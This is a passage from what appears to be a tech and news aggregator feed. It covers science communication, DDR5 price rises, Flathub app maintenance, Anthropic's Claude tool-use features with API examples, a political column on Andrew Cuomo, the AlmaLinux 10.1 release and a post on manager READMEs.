From the time of Galileo in the 1600s until the dawn of the 21st century, science was widely regarded as the arbiter of truth, yet reliant on communications technologies to spread those truths—such as print publications, radio, or television—which had “some level of informal or formal social control,” Arnot said. The launch of Facebook in 2004 fundamentally changed communication patterns to a “many-to-many” dynamic, which provided “the opportunity to have an infinite number of microcultures” and a “dispersion of authority,” he said.

In spite of that, a recent survey of consumers that asked who they trusted the most on food and nutrition information found that the top three answers were registered dietitians, primary care physicians, and food scientists—a result that heartened Jaramillo. “I thought No. 1 would be social media influencers,” she said. “We’re still in the game. Does that mean people are getting most information from [those three groups]? No.”

To nudge their way toward being more front-of-mind, food scientists need to listen and ask questions—and then share information, Arnot said. “It’s not about correcting individuals,” he said. “If your pitch is, ‘You’re wrong, and here’s why,’ you’re going to immediately alienate the person. If you listen, ask, listen, ask, and then share, you will find a point of connection. … It’s about finding that point of connection and engaging in meaningful dialogue. That takes practice because we’ve been trained to communicate the science: ‘Here’s what the research says.’”

Scientists communicate with each other by sharing data findings and meta-analyses, Jaramillo agreed. “We’re not taught, as scientists, to communicate with the general public. People don’t respond to that,” she said. “If you say, ‘Look at this data,’ [they respond by saying], ‘Why should I care? This doesn’t impact me. Science is for scientists.’ It feeds into the narrative that science and scientists are not accessible. People think scientists are on this high horse and only able to speak to each other.”

Instead of saying “look at this data,” scientists need to tell a story, Jaramillo said, recalling a person who buttonholed her after a workshop to say they didn’t like GMOs because, “I think it changes our DNA.” She listened, asked questions, and understood better what made the person wary—and then told them about Golden Rice, a genetically modified strain that has saved the lives of an estimated 40,000 to 100,000 children who had been facing severe vitamin A deficiency. “That’s a tangible story that connects with their values,” she said. “It’s an example of something we can give them that’s not just, ‘Here are the facts; here are the facts.’”

Another piece of advice Jaramillo shared: don’t get too emotionally invested or take people’s reactions too personally, which she acknowledged struggling with herself. “I felt like an attack against science was an attack against me: ‘You don’t believe in the work I’m doing,’” she said. “I wanted to scream at the top of my lungs. … I get frustrated with people who don’t understand the safety protocols behind our food. But I can’t expect everyone to have the food science background I do. It’s our job—not just the communicators, but everyone in the food industry—to communicate better about what we do.”ft

About the Author

Ed Finkel is a freelance journalist based in Evanston, Ill. ( edfinkel@edfinkel.com ).

PS5 now costs less than 64GB of DDR5 memory. RAM jumps to $600 due to shortage

Hacker News
www.tomshardware.com
2025-11-24 19:29:12
Comments...
Original Article
G.Skill Trident Z5 Neo RGB DDR5-6000 C26
(Image credit: Tom's Hardware)

Thanks to the AI boom devouring the majority of the world's memory and storage supply, end-consumers are now facing increasingly inflated prices for common components. DDR5 RAM, a necessity for building current-gen Intel or AMD systems, has now reached record highs in terms of pricing; a 64 GB kit of G.Skill's Trident Z5 Neo 6000 MT/s RAM is listed at $599.99 on Newegg right now — that's $200 more than a PS5 Slim or a Microsoft Xbox Series S, and just $50 shy off an entire PS5 Pro at the moment.

Swipe to scroll horizontally

A quick glance at price tracking data, and G.Skill's Trident Z5 Neo kit has regularly sat at $205-$220 for the past few months, and it was only in late October that it started to pick up steam. From September 20th when it was listed at $220, to $640 now. In just 2 months we've witnessed an astounding ~190% surge.

Right as this particular Trident Z5 Neo kit began to skyrocket in price was when the industry first started to pick up on the affects of the AI crunch. A few days later we published our initial coverage on DDR5 RAM price hikes ; from there, the situation has only worsened to reach worrying levels.

NAND Flash pricing decline

(Image credit: Micron)

Insane mark-up aside, the kit itself is one of the best on the market, recommend as the top pick for DDR5 memory in our roundup . Unfortunately, it seems like high prices are going to be the story going forward. The surge in demand for AI projects will see production lines will prioritizing serving AI clients, leaving consumers to pay through the nose or make the best of what they have. Experts speculate that both DRAM and NAND constraints will become normal throughout 2026 as Big Tech looks to pursue AGI.

In the meantime, hard drives are vanishing from store shelves to the point where microSD cards are serving as a feasible replacement for them. Large-capacity nearline HDDs are backordered for 2 years , as a result of which QLC SSDs are now being swept up at alarming rates. Many distributors are even selling memory and motherboards bundled together to combat the global shortage.

Even Valve's upcoming Steam Machine will end up costing more than expected due to the production window of the device aligning with the DRAM crisis. That being said, memory has almost always lived in a rollercoaster cycle, with manufacturers oversupplying for a couple of years, then undersupplying for the next few. Looking at it optimistically, you're probably going to find DDR5 at bargain prices again in 2027 .

Get Tom's Hardware's best news and in-depth reviews, straight to your inbox.

Google Preferred Source

Follow Tom's Hardware on Google News , or add us as a preferred source , to get our latest news, analysis, & reviews in your feeds.

Hassam Nasir is a die-hard hardware enthusiast with years of experience as a tech editor and writer, focusing on detailed CPU comparisons and general hardware news. When he’s not working, you’ll find him bending tubes for his ever-evolving custom water-loop gaming rig or benchmarking the latest CPUs and GPUs just for fun.

Unpowered SSDs slowly lose data

Hacker News
www.xda-developers.com
2025-11-24 19:25:25
Comments...

How do we keep apps maintained on Flathub? (or building a more respectful App Store)

Lobsters
tim.siosm.fr
2025-11-24 19:23:35
Comments...
Original Article

There have been a few discussions about what Flathub should do to push developers to maintain their apps on the latest versions of the published runtimes. But most of those lack important details around how this would actually happen. I will not discuss in this post the technical means that are already in place to help developers keep their dependencies up to date. See the Flathub Safety: A Layered Approach from Source to User blog post instead.

The main thing to have in mind is that Flathub is not a commercial entity like other app stores. Right now, developers that put their apps on Flathub are (in the vast majority) not paid to do so and most apps are under an open source license.

So any discussion that starts with “developers should update to the latest runtime or have their apps removed” directly contradicts the social contract here (which is also in the terms of most open source licenses): You get something for free so don’t go around making demands unless you want to look like a jerk. We are not going to persuade overworked and generally volunteer developers to update their apps by putting pressure on them to do more work. It’s counter productive.

With that out of the way, how do we gently push developers to keep their apps up to date and using the latest runtime? Well, we can pay them. Flathub wants to setup a way to offer payments for applications but unfortunately it’s not ready yet. So in the meantime, the best option is to donate to the projects or developers working on those applications.

And make it very easy for users to do so.

Now we are in luck, this is exactly what some folks have been working on recently. Bazaar is a Flathub first app store that makes it really easy to donate to the apps that you have installed.

But we also need to make sure that the developers actually have something set up to get donations.

And this is were the flatpak-tracker project comes in. This project looks for the donation links in a collection of Flatpaks and checks if there is one and if the website is still up. If it’s not, it opens issues in the repo for tracking and fixing. It also checks if those apps are using the latest runtimes and open issues for that as well ( FreeDesktop , GNOME , KDE ).

If you want to help, you can take a look at this repo for apps that you use and see if things needs to be fixed. Then engage and suggest fixes upstream. Some of this work does not require complex technical skills so it’s a really good way to start contributing. This is probably one of the most direct way to enable developers to receive money from their users, via donations.

Updating the runtime used by an app usually requires more work and more testing, but it’s a great way to get started and to contribute to your favorite apps. And this is not just about Flathub: updating a Qt5 app to run with Qt6, or a GNOME 48 app to 49, will help everyone using the app.

We want to build an App Store that is respectful of the time developers put into developing, submitting, publishing, testing and maintaining their apps.

We don’t want to replicate the predatory model of other app stores.

Will some apps be out of date sometimes? Probably, but I would rather have a sustainable community than an exploiting one.

Claude Advanced Tool Use

Hacker News
www.anthropic.com
2025-11-24 19:21:35
Comments...
Original Article

The future of AI agents is one where models work seamlessly across hundreds or thousands of tools. An IDE assistant that integrates git operations, file manipulation, package managers, testing frameworks, and deployment pipelines. An operations coordinator that connects Slack, GitHub, Google Drive, Jira, company databases, and dozens of MCP servers simultaneously.

To build effective agents , they need to work with unlimited tool libraries without stuffing every definition into context upfront. Our blog article on using code execution with MCP discussed how tool results and definitions can sometimes consume 50,000+ tokens before an agent reads a request. Agents should discover and load tools on-demand, keeping only what's relevant for the current task.

Agents also need the ability to call tools from code. When using natural language tool calling, each invocation requires a full inference pass, and intermediate results pile up in context whether they're useful or not. Code is a natural fit for orchestration logic, such as loops, conditionals, and data transformations. Agents need the flexibility to choose between code execution and inference based on the task at hand.

Agents also need to learn correct tool usage from examples, not just schema definitions. JSON schemas define what's structurally valid, but can't express usage patterns: when to include optional parameters, which combinations make sense, or what conventions your API expects.

Today, we're releasing three features that make this possible:

  • Tool Search Tool, which allows Claude to use search tools to access thousands of tools without consuming its context window
  • Programmatic Tool Calling , which allows Claude to invoke tools in a code execution environment reducing the impact on the model’s context window
  • Tool Use Examples , which provides a universal standard for demonstrating how to effectively use a given tool

In internal testing, we’ve found these features have helped us build things that wouldn’t have been possible with conventional tool use patterns. For example, Claude for Excel uses Programmatic Tool Calling to read and modify spreadsheets with thousands of rows without overloading the model’s context window.

Based on our experience, we believe these features open up new possibilities for what you can build with Claude.

Tool Search Tool

The challenge

MCP tool definitions provide important context, but as more servers connect, those tokens can add up. Consider a five-server setup:

  • GitHub: 35 tools (~26K tokens)
  • Slack: 11 tools (~21K tokens)
  • Sentry: 5 tools (~3K tokens)
  • Grafana: 5 tools (~3K tokens)
  • Splunk: 2 tools (~2K tokens)

That's 58 tools consuming approximately 55K tokens before the conversation even starts. Add more servers like Jira (which alone uses ~17K tokens) and you're quickly approaching 100K+ token overhead. At Anthropic, we've seen tool definitions consume 134K tokens before optimization.

But token cost isn't the only issue. The most common failures are wrong tool selection and incorrect parameters, especially when tools have similar names like notification-send-user vs. notification-send-channel .

Our solution

Instead of loading all tool definitions upfront, the Tool Search Tool discovers tools on-demand. Claude only sees the tools it actually needs for the current task.

Tool Search Tool diagram
Tool Search Tool preserves 191,300 tokens of context compared to 122,800 with Claude’s traditional approach.

Traditional approach:

  • All tool definitions loaded upfront (~72K tokens for 50+ MCP tools)
  • Conversation history and system prompt compete for remaining space
  • Total context consumption: ~77K tokens before any work begins

With the Tool Search Tool:

  • Only the Tool Search Tool loaded upfront (~500 tokens)
  • Tools discovered on-demand as needed (3-5 relevant tools, ~3K tokens)
  • Total context consumption: ~8.7K tokens, preserving 95% of context window

This represents an 85% reduction in token usage while maintaining access to your full tool library. Internal testing showed significant accuracy improvements on MCP evaluations when working with large tool libraries. Opus 4 improved from 49% to 74%, and Opus 4.5 improved from 79.5% to 88.1% with Tool Search Tool enabled.

How the Tool Search Tool works

The Tool Search Tool lets Claude dynamically discover tools instead of loading all definitions upfront. You provide all your tool definitions to the API, but mark tools with defer_loading: true to make them discoverable on-demand. Deferred tools aren't loaded into Claude's context initially. Claude only sees the Tool Search Tool itself plus any tools with defer_loading: false (your most critical, frequently-used tools).

When Claude needs specific capabilities, it searches for relevant tools. The Tool Search Tool returns references to matching tools, which get expanded into full definitions in Claude's context.

For example, if Claude needs to interact with GitHub, it searches for "github," and only github.createPullRequest and github.listIssues get loaded—not your other 50+ tools from Slack, Jira, and Google Drive.

This way, Claude has access to your full tool library while only paying the token cost for tools it actually needs.

Implementation:

{
  "tools": [
    // Include a tool search tool (regex, BM25, or custom)
    {"type": "tool_search_tool_regex_20251119", "name": "tool_search_tool_regex"},

    // Mark tools for on-demand discovery
    {
      "name": "github.createPullRequest",
      "description": "Create a pull request",
      "input_schema": {...},
      "defer_loading": true
    }
    // ... hundreds more deferred tools with defer_loading: true
  ]
}

For MCP servers, you can defer loading entire servers while keeping specific high-use tools loaded:

{
  "type": "mcp_toolset",
  "mcp_server_name": "google-drive",
  "default_config": {"defer_loading": true}, # defer loading the entire server
  "configs": {
    "search_files": {
"defer_loading": false
    }  // Keep most used tool loaded
  }
}

The Claude Developer Platform provides regex-based and BM25-based search tools out of the box, but you can also implement custom search tools using embeddings or other strategies.

When to use the Tool Search Tool

Like any architectural decision, enabling the Tool Search Tool involves trade-offs. The feature adds a search step before tool invocation, so it delivers the best ROI when the context savings and accuracy improvements outweigh additional latency.

Use it when:

  • Tool definitions consuming >10K tokens
  • Experiencing tool selection accuracy issues
  • Building MCP-powered systems with multiple servers
  • 10+ tools available

Less beneficial when:

  • Small tool library (<10 tools)
  • All tools used frequently in every session
  • Tool definitions are compact

Programmatic Tool Calling

The challenge

Traditional tool calling creates two fundamental problems as workflows become more complex:

  • Context pollution from intermediate results : When Claude analyzes a 10MB log file for error patterns, the entire file enters its context window, even though Claude only needs a summary of error frequencies. When fetching customer data across multiple tables, every record accumulates in context regardless of relevance. These intermediate results consume massive token budgets and can push important information out of the context window entirely.
  • Inference overhead and manual synthesis : Each tool call requires a full model inference pass. After receiving results, Claude must "eyeball" the data to extract relevant information, reason about how pieces fit together, and decide what to do next—all through natural language processing. A five tool workflow means five inference passes plus Claude parsing each result, comparing values, and synthesizing conclusions. This is both slow and error-prone.

Our solution

Programmatic Tool Calling enables Claude to orchestrate tools through code rather than through individual API round-trips. Instead of Claude requesting tools one at a time with each result being returned to its context, Claude writes code that calls multiple tools, processes their outputs, and controls what information actually enters its context window.

Claude excels at writing code and by letting it express orchestration logic in Python rather than through natural language tool invocations, you get more reliable, precise control flow. Loops, conditionals, data transformations, and error handling are all explicit in code rather than implicit in Claude's reasoning.

Example: Budget compliance check

Consider a common business task: "Which team members exceeded their Q3 travel budget?"

You have three tools available:

  • get_team_members(department) - Returns team member list with IDs and levels
  • get_expenses(user_id, quarter) - Returns expense line items for a user
  • get_budget_by_level(level) - Returns budget limits for an employee level

Traditional approach :

  • Fetch team members → 20 people
  • For each person, fetch their Q3 expenses → 20 tool calls, each returning 50-100 line items (flights, hotels, meals, receipts)
  • Fetch budget limits by employee level
  • All of this enters Claude's context: 2,000+ expense line items (50 KB+)
  • Claude manually sums each person's expenses, looks up their budget, compares expenses against budget limits
  • More round-trips to the model, significant context consumption

With Programmatic Tool Calling :

Instead of each tool result returning to Claude, Claude writes a Python script that orchestrates the entire workflow. The script runs in the Code Execution tool (a sandboxed environment), pausing when it needs results from your tools. When you return tool results via the API, they're processed by the script rather than consumed by the model. The script continues executing, and Claude only sees the final output.

Programmatic tool calling flow
Programmatic Tool Calling enables Claude to orchestrate tools through code rather than through individual API round-trips, allowing for parallel tool execution.

Here's what Claude's orchestration code looks like for the budget compliance task:

team = await get_team_members("engineering")

# Fetch budgets for each unique level
levels = list(set(m["level"] for m in team))
budget_results = await asyncio.gather(*[
    get_budget_by_level(level) for level in levels
])

# Create a lookup dictionary: {"junior": budget1, "senior": budget2, ...}
budgets = {level: budget for level, budget in zip(levels, budget_results)}

# Fetch all expenses in parallel
expenses = await asyncio.gather(*[
    get_expenses(m["id"], "Q3") for m in team
])

# Find employees who exceeded their travel budget
exceeded = []
for member, exp in zip(team, expenses):
    budget = budgets[member["level"]]
    total = sum(e["amount"] for e in exp)
    if total > budget["travel_limit"]:
        exceeded.append({
            "name": member["name"],
            "spent": total,
            "limit": budget["travel_limit"]
        })

print(json.dumps(exceeded))

Claude's context receives only the final result: the two to three people who exceeded their budget. The 2,000+ line items, the intermediate sums, and the budget lookups do not affect Claude’s context, reducing consumption from 200KB of raw expense data to just 1KB of results.

The efficiency gains are substantial:

  • Token savings : By keeping intermediate results out of Claude's context, PTC dramatically reduces token consumption. Average usage dropped from 43,588 to 27,297 tokens, a 37% reduction on complex research tasks.
  • Reduced latency : Each API round-trip requires model inference (hundreds of milliseconds to seconds). When Claude orchestrates 20+ tool calls in a single code block, you eliminate 19+ inference passes. The API handles tool execution without returning to the model each time.
  • Improved accuracy : By writing explicit orchestration logic, Claude makes fewer errors than when juggling multiple tool results in natural language. Internal knowledge retrieval improved from 25.6% to 28.5%; GIA benchmarks from 46.5% to 51.2%.

Production workflows involve messy data, conditional logic, and operations that need to scale. Programmatic Tool Calling lets Claude handle that complexity programmatically while keeping its focus on actionable results rather than raw data processing.

How Programmatic Tool Calling works

1. Mark tools as callable from code

Add code_execution to tools, and set allowed_callers to opt-in tools for programmatic execution:

{
  "tools": [
    {
      "type": "code_execution_20250825",
      "name": "code_execution"
    },
    {
      "name": "get_team_members",
      "description": "Get all members of a department...",
      "input_schema": {...},
      "allowed_callers": ["code_execution_20250825"] # opt-in to programmatic tool calling
    },
    {
      "name": "get_expenses",
 	...
    },
    {
      "name": "get_budget_by_level",
	...
    }
  ]
}

The API converts these tool definitions into Python functions that Claude can call.

2. Claude writes orchestration code

Instead of requesting tools one at a time, Claude generates Python code:

{
  "type": "server_tool_use",
  "id": "srvtoolu_abc",
  "name": "code_execution",
  "input": {
    "code": "team = get_team_members('engineering')\n..." # the code example above
  }
}

3. Tools execute without hitting Claude's context

When the code calls get_expenses(), you receive a tool request with a caller field:

{
  "type": "tool_use",
  "id": "toolu_xyz",
  "name": "get_expenses",
  "input": {"user_id": "emp_123", "quarter": "Q3"},
  "caller": {
    "type": "code_execution_20250825",
    "tool_id": "srvtoolu_abc"
  }
}

You provide the result, which is processed in the Code Execution environment rather than Claude's context. This request-response cycle repeats for each tool call in the code.

4. Only final output enters context

When the code finishes running, only the results of the code are returned to Claude:

{
  "type": "code_execution_tool_result",
  "tool_use_id": "srvtoolu_abc",
  "content": {
    "stdout": "[{\"name\": \"Alice\", \"spent\": 12500, \"limit\": 10000}...]"
  }
}

This is all Claude sees, not the 2000+ expense line items processed along the way.

When to use Programmatic Tool Calling

Programmatic Tool Calling adds a code execution step to your workflow. This extra overhead pays off when the token savings, latency improvements, and accuracy gains are substantial.

Most beneficial when:

  • Processing large datasets where you only need aggregates or summaries
  • Running multi-step workflows with three or more dependent tool calls
  • Filtering, sorting, or transforming tool results before Claude sees them
  • Handling tasks where intermediate data shouldn't influence Claude's reasoning
  • Running parallel operations across many items (checking 50 endpoints, for example)

Less beneficial when:

  • Making simple single-tool invocations
  • Working on tasks where Claude should see and reason about all intermediate results
  • Running quick lookups with small responses

Tool Use Examples

The challenge

JSON Schema excels at defining structure–types, required fields, allowed enums–but it can't express usage patterns: when to include optional parameters, which combinations make sense, or what conventions your API expects.

Consider a support ticket API:

{
  "name": "create_ticket",
  "input_schema": {
    "properties": {
      "title": {"type": "string"},
      "priority": {"enum": ["low", "medium", "high", "critical"]},
      "labels": {"type": "array", "items": {"type": "string"}},
      "reporter": {
        "type": "object",
        "properties": {
          "id": {"type": "string"},
          "name": {"type": "string"},
          "contact": {
            "type": "object",
            "properties": {
              "email": {"type": "string"},
              "phone": {"type": "string"}
            }
          }
        }
      },
      "due_date": {"type": "string"},
      "escalation": {
        "type": "object",
        "properties": {
          "level": {"type": "integer"},
          "notify_manager": {"type": "boolean"},
          "sla_hours": {"type": "integer"}
        }
      }
    },
    "required": ["title"]
  }
}

The schema defines what's valid, but leaves critical questions unanswered:

  • Format ambiguity: Should due_date use "2024-11-06", "Nov 6, 2024", or "2024-11-06T00:00:00Z"?
  • ID conventions: Is reporter.id a UUID, "USR-12345", or just "12345"?
  • Nested structure usage: When should Claude populate reporter.contact ?
  • Parameter correlations: How do escalation.level and escalation.sla_hours relate to priority?

These ambiguities can lead to malformed tool calls and inconsistent parameter usage.

Our solution

Tool Use Examples let you provide sample tool calls directly in your tool definitions. Instead of relying on schema alone, you show Claude concrete usage patterns:

{
    "name": "create_ticket",
    "input_schema": { /* same schema as above */ },
    "input_examples": [
      {
        "title": "Login page returns 500 error",
        "priority": "critical",
        "labels": ["bug", "authentication", "production"],
        "reporter": {
          "id": "USR-12345",
          "name": "Jane Smith",
          "contact": {
            "email": "jane@acme.com",
            "phone": "+1-555-0123"
          }
        },
        "due_date": "2024-11-06",
        "escalation": {
          "level": 2,
          "notify_manager": true,
          "sla_hours": 4
        }
      },
      {
        "title": "Add dark mode support",
        "labels": ["feature-request", "ui"],
        "reporter": {
          "id": "USR-67890",
          "name": "Alex Chen"
        }
      },
      {
        "title": "Update API documentation"
      }
    ]
  }

From these three examples, Claude learns:

  • Format conventions : Dates use YYYY-MM-DD, user IDs follow USR-XXXXX, labels use kebab-case
  • Nested structure patterns : How to construct the reporter object with its nested contact object
  • Optional parameter correlations : Critical bugs have full contact info + escalation with tight SLAs; feature requests have reporter but no contact/escalation; internal tasks have title only

In our own internal testing, tool use examples improved accuracy from 72% to 90% on complex parameter handling.

When to use Tool Use Examples

Tool Use Examples add tokens to your tool definitions, so they’re most valuable when accuracy improvements outweigh the additional cost.

Most beneficial when:

  • Complex nested structures where valid JSON doesn't imply correct usage
  • Tools with many optional parameters and inclusion patterns matter
  • APIs with domain-specific conventions not captured in schemas
  • Similar tools where examples clarify which one to use (e.g., create_ticket vs create_incident )

Less beneficial when:

  • Simple single-parameter tools with obvious usage
  • Standard formats like URLs or emails that Claude already understands
  • Validation concerns better handled by JSON Schema constraints

Best practices

Building agents that take real-world actions means handling scale, complexity, and precision simultaneously. These three features work together to solve different bottlenecks in tool use workflows. Here's how to combine them effectively.

Layer features strategically

Not every agent needs to use all three features for a given task. Start with your biggest bottleneck:

  • Context bloat from tool definitions → Tool Search Tool
  • Large intermediate results polluting context → Programmatic Tool Calling
  • Parameter errors and malformed calls → Tool Use Examples

This focused approach lets you address the specific constraint limiting your agent's performance, rather than adding complexity upfront.

Then layer additional features as needed. They're complementary: Tool Search Tool ensures the right tools are found, Programmatic Tool Calling ensures efficient execution, and Tool Use Examples ensure correct invocation.

Set up Tool Search Tool for better discovery

Tool search matches against names and descriptions, so clear, descriptive definitions improve discovery accuracy.

// Good
{
    "name": "search_customer_orders",
    "description": "Search for customer orders by date range, status, or total amount. Returns order details including items, shipping, and payment info."
}

// Bad
{
    "name": "query_db_orders",
    "description": "Execute order query"
}

Add system prompt guidance so Claude knows what's available:

You have access to tools for Slack messaging, Google Drive file management, 
Jira ticket tracking, and GitHub repository operations. Use the tool search 
to find specific capabilities.

Keep your three to five most-used tools always loaded, defer the rest. This balances immediate access for common operations with on-demand discovery for everything else.

Set up Programmatic Tool Calling for correct execution

Since Claude writes code to parse tool outputs, document return formats clearly. This helps Claude write correct parsing logic:

{
    "name": "get_orders",
    "description": "Retrieve orders for a customer.
Returns:
    List of order objects, each containing:
    - id (str): Order identifier
    - total (float): Order total in USD
    - status (str): One of 'pending', 'shipped', 'delivered'
    - items (list): Array of {sku, quantity, price}
    - created_at (str): ISO 8601 timestamp"
}

See below for opt-in tools that benefit from programmatic orchestration:

  • Tools that can run in parallel (independent operations)
  • Operations safe to retry (idempotent)

Set up Tool Use Examples for parameter accuracy

Craft examples for behavioral clarity:

  • Use realistic data (real city names, plausible prices, not "string" or "value")
  • Show variety with minimal, partial, and full specification patterns
  • Keep it concise: 1-5 examples per tool
  • Focus on ambiguity (only add examples where correct usage isn't obvious from schema)

Getting started

These features are available in beta. To enable them, add the beta header and include the tools you need:

client.beta.messages.create(
    betas=["advanced-tool-use-2025-11-20"],
    model="claude-sonnet-4-5-20250929",
    max_tokens=4096,
    tools=[
        {"type": "tool_search_tool_regex_20251119", "name": "tool_search_tool_regex"},
        {"type": "code_execution_20250825", "name": "code_execution"},
        # Your tools with defer_loading, allowed_callers, and input_examples
    ]
)

For detailed API documentation and SDK examples, see our:

These features move tool use from simple function calling toward intelligent orchestration. As agents tackle more complex workflows spanning dozens of tools and large datasets, dynamic discovery, efficient execution, and reliable invocation become foundational.

We're excited to see what you build.

Acknowledgements

Written by Bin Wu, with contributions from Adam Jones, Artur Renault, Henry Tay, Jake Noble, Nathan McCandlish, Noah Picard, Sam Jiang, and the Claude Developer Platform team. This work builds on foundational research by Chris Gorgolewski, Daniel Jiang, Jeremy Fox and Mike Lambert. We also drew inspiration from across the AI ecosystem, including Joel Pobar's LLMVM , Cloudflare's Code Mode and Code Execution as MCP . Special thanks to Andy Schumeister, Hamish Kerr, Keir Bradwell, Matt Bleifer and Molly Vorwerck for their support.

Andrew Cuomo Is Riding This Thing All the Way to the Bottom

hellgate
hellgatenyc.com
2025-11-24 19:18:33
Cuomo and another washed up former governor telling each other "Exactlyyyyy."...
Original Article

Andrew Cuomo, who resigned in disgrace as governor to avoid being impeached, before being soundly rejected by voters twice this year when he ran for mayor of New York City, is not going gently into that good night.

Across two excruciating hours on Monday morning, Cuomo and his inconstant ally , former Governor David Paterson , discussed the election on John Catsimatidis's radio station . Listeners tuning in to hear new analysis or insight born of a little distance from Election Day were disappointed.

At a plodding pace, intermittently interrupted by musical cues signalling the need to cut to personal injury lawyer commercials, the two men relitigated the election, agreeing with each other that all the points they made during the campaign that failed to persuade voters—free buses are a pipe dream, taxing the rich is folly, the city is teetering on the edge of a crime crisis for which more police are the only solution—were in fact correct. They agreed that Cuomo should have won, but for a bunch of factors that don't really signify anything, that the man voters preferred to Cuomo, Zohran Mamdani, is a panderer selling a policy program of "no classes, free pizza on Friday," Mamdani doesn't have a mandate, because lots of people voted for Cuomo, the two men agreed. Further consensus: Mamdani was good at TikTok, but his policies don't make sense. They will drive the rich and the middle class from New York. Cuomo would have won, but for Curtis Sliwa and his enormous ego, who embarrassed himself.

As the old saw goes , "It is always 2 dumb bitches telling each other 'exactlyyyyy.'"

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

AlmaLinux 10.1 released

Linux Weekly News
lwn.net
2025-11-24 19:18:14
AlmaLinux 10.1 has been released. In addition to providing binary compatibility with Red Hat Enterprise Linux (RHEL) 10.1, the most notable feature in AlmaLinux 10.1 is the addition of support for Btrfs, which is not available in RHEL: Btrfs support encompasses both kernel and userspace ...
Original Article

AlmaLinux 10.1 has been released . In addition to providing binary compatibility with Red Hat Enterprise Linux (RHEL) 10.1, the most notable feature in AlmaLinux 10.1 is the addition of support for Btrfs , which is not available in RHEL:

Btrfs support encompasses both kernel and userspace enablement, and it is now possible to install AlmaLinux OS on a Btrfs filesystem from the very beginning. Initial enablement was scoped to the installer and storage management stack, and broader support within the AlmaLinux software collection for Btrfs features is forthcoming.

In addition to Btrfs support, AlmaLinux OS 10.1 includes numerous other improvements to serve our community. We have continued to extend hardware support both by adding drivers and by adding a secondary version of AlmaLinux OS and EPEL to extend support of x86_64_v2 processors.

See the release notes for a full list of changes.



Revisiting Manager READMEs

Elided Branches
www.elidedbranches.com
2025-11-22 19:02:00
Several years ago, I published a critique of manager READMEs that succeeded in stirring up a lot of feelings, pro and con. I’d like to believe it prompted some people to reconsider whether these are actually effective tools.Today, I want to revisit this. Not to encourage you to write a manager READM...
Original Article

Several years ago, I published a critique of manager READMEs that succeeded in stirring up a lot of feelings, pro and con. I’d like to believe it prompted some people to reconsider whether these are actually effective tools.

Today, I want to revisit this. Not to encourage you to write a manager README, but to suggest other ways forward that I have learned in the years since writing the first post.

The Problem

When you become a senior manager or an executive, you face new challenges. Your job involves directing work across many people with different approaches, styles, and opinions. Left to their own devices, each person will develop a slightly different way of communicating with you, one that works for them and that they believe works for you.

With a broad scope of work to oversee, you need to quickly grasp what matters and should be shared upward, outward, and down into different parts of your organization. Now, at most companies, this is a known problem and inevitably someone has already tried to solve it by means of standardized tooling and reporting. Everyone uses Jira for a reason and it’s not that Jira is the best tool ever, but it is malleable to many types of standardization. Companies implement OKR tools and Tableau dashboards, they institute various program management processes, they run quarterly business reviews, and all of these are done in the name of standardizing the information that is passed upward and outward so that people can make better decisions.

Unfortunately, this is typically the lowest common denominator of usefulness to any senior manager. Reporting generated in this way obscures as much as it reveals, and it rarely addresses the things that you really care about¹. So senior managers need other mechanisms for imparting what they want to hear about and see. The README can sometimes be an attempt to impart that cultural overlay: a way of saying, “I care about X, and want you to focus on that when you communicate to me; I don’t care much about Y and Z, and by the way, it’s best if you communicate with me in these ways.”

I remain steadfast that this is not a good approach. It creates a focus on you as the person to be managed up to. Your personality must be accommodated, your preferences honored. I get the desire for this, and I’m certainly not immune to being managed up to, but my preference is to avoid major blind spots. I want to hear what I care about, yes, but I don’t want to live in an information bubble either.

READMEs are also rather lazy. There’s a kernel of truth in their purpose: we want people to focus certain types of communication on what we believe is most valuable. However, doing it in the form of a general README isn’t actually the most effective approach.

So if not READMEs, what then?

The Solution: Appropriate Templates and Ceremonies

Instead of one doc that attempts to communicate all of your preferences and warts and creates a you-focused mindset, it’s time to level up and recognize that a big part of the job of senior/executive management is setting standards for doing certain types of work. The best way to set those standards, in my experience, is lightweight templates and ceremonies for information sharing, discussion, and decision-making.

I think that every good senior manager should have some toolkit of these. You aren’t just going to operate against the lowest common denominator of pre-existing reports and processes in your company, you have to establish a few processes that exist to show what you care about and where you want the organization to focus. One of mine is Wins and Challenges (discussed in my recent book ), which I’ve brought from startups to giant teams and everything in-between. Is it extra work on top of whatever people might be doing in Jira or other tools? Possibly. Does it create far more valuable conversation across my leadership team than those tools? Yes. Does it help me specifically understand things and do my job better? Absolutely.

There is a very lightweight template to follow for my Wins and Challenges, and the process details are owned by the team gathering the information (although I specify opinions about how it should be done, I only check the outcomes). I find that the best templates and processes are lightweight in a way that they show what information should be collected but don’t dictate exactly the process to collect that information.

Developing templates that expose the right useful information is hard. You will both over-do and under-do this as you’re figuring it out, whether it’s your first time in the job, you’ve moved to a different company or team, or your team has just evolved past the usefulness of the old methods. My advice is to start simple and add on new details or processes only when it’s clear you have a widespread gap. A good rhythm for a new job/team is to learn for 90 days, then introduce what you need, and evolve from there with enough time to learn from each iteration (usually, 1-2 quarters).

Don’t Try To Template/Processify Everything

I recently asked an experienced CPO about good product processes, and what they looked like from his perspective. One piece of advice was that not everything should have a fixed process or template. When you need to leave room for discussion, it’s often best to limit the structure; a walkthrough of a prototype might be better done as an open-ended exploration and discussion rather than a formal set of steps.

It’s important not to give into the temptation (or external pressure) to create processes for everything. I personally do not have a fixed format for my 1-1s, and dislike even the expectation of coming with a set of written and shared topics. I don’t want to feel rushed to finish everything on an agenda, and the temptation to immediately jump to conclusions about a topic based on an agenda item often increases miscommunication. Sometimes there’s a need to pre-read and prepare, but sometimes we just need to talk and see where the exploration of current top-of-mind concerns and information takes us.

So, senior leaders, you can tell people how you want them to work with you, but don’t do it via the crude mechanism of a manager README. Drive clarity through templates and processes where needed, resist the urge to create them everywhere, and lead your organization by showing them where to spend their time and focus as a collective good, not just good for you.

¹ Think of it this way, if you could easily see the problems via the pre-existing dashboards, they’d already be on their way to being solved. Dashboards are like alerts and tests in this way, they tend to catch what you know could go wrong, but rarely the surprise problems that lead to big incidents. Necessary, but insufficient.

Enjoy this post? You might like my books: The Manager’s Path , and Platform Engineering: A Guide for Technical, Product, and People Leaders , available on Amazon and Safari Online.

sqlite-utils 3.39

Simon Willison
simonwillison.net
2025-11-24 18:59:14
sqlite-utils 3.39 I got a report of a bug in sqlite-utils concerning plugin installation - if you installed the package using uv tool install further attempts to install plugins with sqlite-utils install X would fail, because uv doesn't bundle pip by default. I had the same bug with Datasette a whil...
Original Article

